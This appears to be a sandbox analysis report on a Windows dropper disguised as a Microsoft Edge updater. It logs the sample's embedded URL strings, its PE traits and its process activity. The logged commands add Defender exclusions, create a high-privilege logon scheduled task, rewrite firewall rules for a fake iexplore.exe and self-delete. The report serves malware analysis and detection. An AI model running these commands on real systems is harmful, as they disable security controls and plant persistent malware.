Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://ocsp.digicert.com0C
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://ocsp.digicert.com0N
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: _sfc64.cp37-win32.pyd.15.drString found in binary or memory: http://pracrand.sourceforge.net/RNG_engines.txt
Source: python37.dll.15.drString found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.1839674107.0000020823101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1999026288.00000274535BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2075247518.000001D613313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2162722138.0000019EC62B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2273918965.000001FBD8E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: cv2.pyd.15.drString found in binary or memory: http://torch.ch
Source: cv2.pyd.15.drString found in binary or memory: http://torch.ch/)
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: cv2.pyd.15.drString found in binary or memory: http://underdestruction.com/2004/02/25/stackblur-2004.
Source: Amcache.hve.22.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: cv2.pyd.15.drString found in binary or memory: http://www.dai.ed.ac.uk/CVonline/LOCAL_COPIES/MANDUCHI1/Bilateral_Filtering.html
Source: cv2.pyd.15.drString found in binary or memory: http://www.gdal.org)
Source: cv2.pyd.15.drString found in binary or memory: http://www.gdal.org/formats_list.html)
Source: cv2.pyd.15.drString found in binary or memory: http://www.gdal.org/ogr_formats.html).
Source: cv2.pyd.15.drString found in binary or memory: http://www.ipol.im/pub/algo/bcm_non_local_means_denoising
Source: cv2.pyd.15.drString found in binary or memory: http://www.ipol.im/pub/algo/bcm_non_local_means_denoising/
Source: _multiarray_umath.cp37-win32.pyd.15.drString found in binary or memory: http://www.math.sfu.ca/~cbm/aands/
Source: _multiarray_umath.cp37-win32.pyd.15.drString found in binary or memory: http://www.math.sfu.ca/~cbm/aands/page_69.htm
Source: bit_generator.cp37-win32.pyd.15.drString found in binary or memory: http://www.pcg-random.org/posts/developing-a-seed_seq-alternative.html
Source: _sfc64.cp37-win32.pyd.15.drString found in binary or memory: http://www.pcg-random.org/posts/random-invertible-mapping-statistics.html
Source: powershell.exe, 00000002.00000002.1839674107.0000020823101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1999026288.000002745359C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1999026288.000002745356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2075247518.000001D61334D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2075247518.000001D613339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2162722138.0000019EC628D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2162722138.0000019EC6270000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2273918965.000001FBD8DDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2273918965.000001FBD8DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: cv2.pyd.15.drString found in binary or memory: https://arxiv.org/abs/1704.04503
Source: powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: bit_generator.cp37-win32.pyd.15.drString found in binary or memory: https://gist.github.com/imneme/540829265469e673d045
Source: cv2.pyd.15.drString found in binary or memory: https://github.com/NVIDIA/caffe.
Source: powershell.exe, 00000002.00000002.1839674107.0000020823329000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: cv2.pyd.15.drString found in binary or memory: https://github.com/opencv/opencv/issues/16739
Source: cv2.pyd.15.drString found in binary or memory: https://github.com/opencv/opencv/issues/16739cv::MatOp_AddEx::assign4g
Source: cv2.pyd.15.drString found in binary or memory: https://github.com/opencv/opencv/issues/23152.
Source: cv2.pyd.15.drString found in binary or memory: https://github.com/opencv/opencv/issues/5412.
Source: cv2.pyd.15.drString found in binary or memory: https://github.com/opencv/opencv/issues/6293
Source: cv2.pyd.15.drString found in binary or memory: https://github.com/opencv/opencv/issues/6293u-
Source: cv2.pyd.15.drString found in binary or memory: https://github.com/openvinotoolkit/open_model_zoo/blob/master/models/public/yolo-v2-tiny-tf/yolo-v2-
Source: cv2.pyd.15.drString found in binary or memory: https://github.com/torch/nn/blob/master/doc/module.md
Source: powershell.exe, 00000002.00000002.1897044803.000002083316F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: __init__.py4.15.drString found in binary or memory: https://numpy.org/doc/stable/user/basics.subclassing.html
Source: cv2.pyd.15.drString found in binary or memory: https://onnx.ai/
Source: cv2.pyd.15.drString found in binary or memory: https://onnx.ai/)
Source: cv2.pyd.15.drString found in binary or memory: https://pjreddie.com/darknet/
Source: cv2.pyd.15.drString found in binary or memory: https://pjreddie.com/darknet/)
Source: cv2.pyd.15.drString found in binary or memory: https://software.intel.com/openvino-toolkit)
Source: cv2.pyd.15.drString found in binary or memory: https://static.aminer.org/pdf/PDF/000/317/196/spatio_temporal_wiener_filtering_of_image_sequences_us
Source: select.pyd.15.dr, _socket.pyd.15.dr, _hashlib.pyd.15.dr, python37.dll.15.dr, _ctypes.pyd.15.dr, _elementtree.pyd.15.drString found in binary or memory: https://www.digicert.com/CPS0
Source: cv2.pyd.15.drString found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/
Source: cv2.pyd.15.drString found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/nativeVectorWidthIntdecode(img
Source: cv2.pyd.15.drString found in binary or memory: https://www.tensorflow.org/
Source: cv2.pyd.15.drString found in binary or memory: https://www.tensorflow.org/)
Source: cv2.pyd.15.drString found in binary or memory: https://www.tensorflow.org/lite

System Summary

barindex
PE file contains section with special chars
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: section name: =0aP
PE file has nameless sections
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: section name:
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 280 -s 1376
Source: opencv_videoio_ffmpeg480.dll.15.drStatic PE information: Number of sections : 11 > 10
Source: libopenblas.VTYUM5MXKVFE4PZZER3L7PNO6YB4XFF3.gfortran-win32.dll.15.drStatic PE information: Number of sections : 18 > 10
Source: api-ms-win-core-file-l2-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-handle-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-errorhandling-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: python3.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.15.drStatic PE information: No import functions for PE file found
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D872000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMlcrosoftEdgeUpdate.exeH vs SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000000.1697839610.0000021C1BB52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameinstaller1.exe6 vs SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe, 00000000.00000002.2238150261.0000021C1D86E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMlcrosoftEdgeUpdate.exeH vs SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engineClassification label: mal100.troj.evad.winEXE@55/112@18/1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe.logJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess280
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:772:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4936:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1352:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile created: C:\Users\user\AppData\Local\Temp\selfdelete.batJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat""
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeReversingLabs: Detection: 62%
Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe "C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe"
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\ProgramData\Microsoft\Bound.exe "C:\ProgramData\Microsoft\Bound.exe"
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 280 -s 1376
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat""
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=out program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Outbound' dir=out action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Outbound" dir=out action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat""
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /fJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /fJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe "C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\ProgramData\Microsoft\Bound.exe "C:\ProgramData\Microsoft\Bound.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /fJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" Jump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=out program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Outbound' dir=out action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat""Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Outbound" dir=out action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeSection loaded: kernel.appcore.dllJump to behavior
